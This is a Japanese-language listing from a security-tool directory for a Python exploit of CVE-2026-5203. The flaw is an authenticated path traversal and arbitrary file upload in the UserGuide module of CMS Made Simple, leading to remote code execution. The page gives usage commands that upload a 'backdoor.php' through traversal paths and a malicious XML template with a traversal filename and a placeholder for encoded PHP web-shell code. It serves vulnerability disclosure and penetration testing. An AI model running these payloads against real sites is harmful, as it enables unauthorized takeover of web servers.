Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5203 — CVE-2026-5203 用の Python エクスプロイト: CMS Made Simple ≤ 2.22 における認証済みパストラバーサルと任意ファイルアップロード。PHP Web シェルの展開によるリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/caginkyr/cve-2026-5203
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubcaginkyr/cve-2026-5203

CVE-2026-5203

CVE-2026-5203 用の Python エクスプロイト: CMS Made Simple ≤ 2.22 における認証済みパストラバーサルと任意ファイルアップロード。PHP Web シェルの展開によるリモートコード実行を可能にします。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-5203 — CMS Made Simple ≤ 2.2.22 RCE(パストラバーサル+任意ファイルアップロード)

CVSS Version Type

概要

CMS Made Simple ≤ 2.2.22 の UserGuide モジュールの XML インポート機能は、ユーザーが指定したファイル名をサニタイズしないため、認証された管理者がパストラバーサルシーケンスを介して任意のファイル(例:PHP ウェブシェル)をサーバーファイルシステム上の任意の場所にアップロードできます。

フィールド値
タイプパストラバーサル / 任意ファイルアップロード → RCE
コンポーネントUserGuide モジュール — XML インポート
影響を受けるファイルmodules/UserGuide/lib/class.UserGuideImporterExporter.php
CVSS v3.17.2 HIGH — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
認証要件はい(管理者)

脆弱なコード

root@kitploit:~
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   

関数は Base64 デコードされたコンテンツを攻撃者が制御するパスに直接書き込みます。


使用方法

root@kitploit:~
python exploit.py <base_url> <admin_url> <username> <password> [upload_path]

例:

root@kitploit:~
# デフォルトパス
python exploit.py http://target.com http://target.com/admin admin password123

# カスタムアップロードパス
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php

アップロード後に Web シェルにアクセス可能な場合、インタラクティブシェルが自動的に起動します。


悪意のある XML 構造

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<modulecontent>
  <module>UserGuide</module>
  <version>1.3</version>
  <files>
    <file>
      <filename>../../../webshell.php</filename>
      <isdir>0</isdir>
      <data>[BASE64_ENCODED_PHP_CODE]</data>
    </file>
  </files>
</modulecontent>
ツールをダウンロード